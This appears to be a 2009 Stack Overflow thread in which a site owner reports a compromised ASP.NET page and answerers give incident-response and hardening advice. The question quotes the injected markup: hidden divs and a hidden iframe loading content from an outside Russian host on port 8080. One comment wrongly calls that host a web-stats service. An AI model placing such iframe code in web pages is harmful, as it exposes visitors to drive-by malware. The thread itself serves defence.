Someone is putting this code onto my aspx page.

What are they doing?

How are they doing it?

How do I stop them?

It's on a shared hosting server.

It's on an aspx content page which has a master page and is after the </asp:content> tag...

<div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div>

<div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div>

<div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div>

<div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div>

<div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div>

<div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="http://bionaft.ru:8080/index.php" ></iframe></div>
link|improve this question
Thats the code <div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div> <div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div> <div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div> <div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div> <div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div> <div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="bionaft.ru:8080/index.php"; ></iframe></div> – Brendan Waters Oct 7 '09 at 9:06
please provide more info as to what code are you exactly executing on this page. are you taking user input in any form (query strings, form post, etc)? – Raj Oct 7 '09 at 9:09
What's the URL? – Troy Hunt Oct 7 '09 at 9:11
Who's the hosting service? Are they reputable? Could it be hosting service injected advertising? – Skizz Oct 7 '09 at 9:15
I just did a Google on "bionaft.ru" and they appear to be web-stats service. Perhaps the added code is web-stat data? – Skizz Oct 7 '09 at 9:48
show 1 more comment
feedback

6 Answers

Take your site offline.

No, I'm being serious.

Take it offline and look at all points that you deal with user inputs and look at your code and sanitise every user input, and every output. There's plenty of documentation on XSS, Code Injection and such.

link|improve this answer
Are you serious, this is a production site with clients, is there a way to find where they are doing this from? – Brendan Waters Oct 7 '09 at 9:17
10  
Of course I'm serious. You leave it running as it is, and search engines will crawl it with the malicious data and get you blacklisted for hosting malicious content, a banner that takes a long time to get reverted. Get your webserver logs and your code, take that site offline, clean up the code they've injected and sanitise your inputs. – squeeks Oct 7 '09 at 9:19
Thanks for your help and your prompt reply. – Brendan Waters Oct 7 '09 at 9:22
1  
Make sure you compare your source code with an existing copy you take from you revision control system. If they could modify your source code, they could easily modify other parts to leave themselves a back door (although this is probably an automated attack). They could also have compromised your whole server... – Locksfree Oct 7 '09 at 9:24
1  
Turn the lights off as soon as possible. Don't wait, Googlebot won't be. – squeeks Oct 7 '09 at 9:29
show 3 more comments
feedback

Is it yet another Automated SQL Injection attack? Check out your logs and see if there is something with "DECLARE" in it. (assuming you are using SQL Server)

link|improve this answer
feedback

It seems that you are not the only one. Google for it:

link|improve this answer
feedback

How does the page get rendered - is there content coming from a database? What is the url? have you set validateRequest to false?

more info needed I think

link|improve this answer
Also, Have you downloaded the source file for the aspx or ascx (or whatever) for the page in question? Does it look the same as your source controlled version? – Paul Oct 7 '09 at 9:41
no its got the injected code in it. I removed it last night and its back I also got about 16o errors on my site with my css files I think they were scanning for something, but they got the path to the css files incorrect – Brendan Waters Oct 7 '09 at 9:45
Sounds like the server has been compromised fella. If it's a manged server, get on the phone to the host... if not, I would probably flatten and resinstall everything with new passwords. If this is not possible, change all passwords - check out user accounts on the server - remove any that you do not know about. – Paul Oct 7 '09 at 9:49
feedback

It's on an aspx content page which has a master page and is after the </asp:content> tag...

Do you mean someone has got onto your sever and edited the .aspx files on the server? If that's the case make sure you have locked down any file shares and change all your passwords for ftp and the like.

If it's that the rendered pages have been mashed then the advice from @squeeks is the way to go.

link|improve this answer
The page is dynamically driven from the database. ValidateRequest is not set to false. I dont see any weird data in the logs or the tables within the database that are affected by this page. Its outside the content tags on the aspx page...Im beginning to think that my password has been compromised – Brendan Waters Oct 7 '09 at 9:35
feedback

Try looking into the AntiXSS libary; pages that are important, turn them off for a while. I believe you will need to update the code, use AntiXSS in every url; switch all of your direct query generation to Parameter based query generation; and than, things will be under control. Also, there is a lot of stuff regarding whitelist items on google/bing.

link|improve this answer
feedback

Your Answer

 
or
required, but never shown

Not the answer you're looking for? Browse other questions tagged or ask your own question.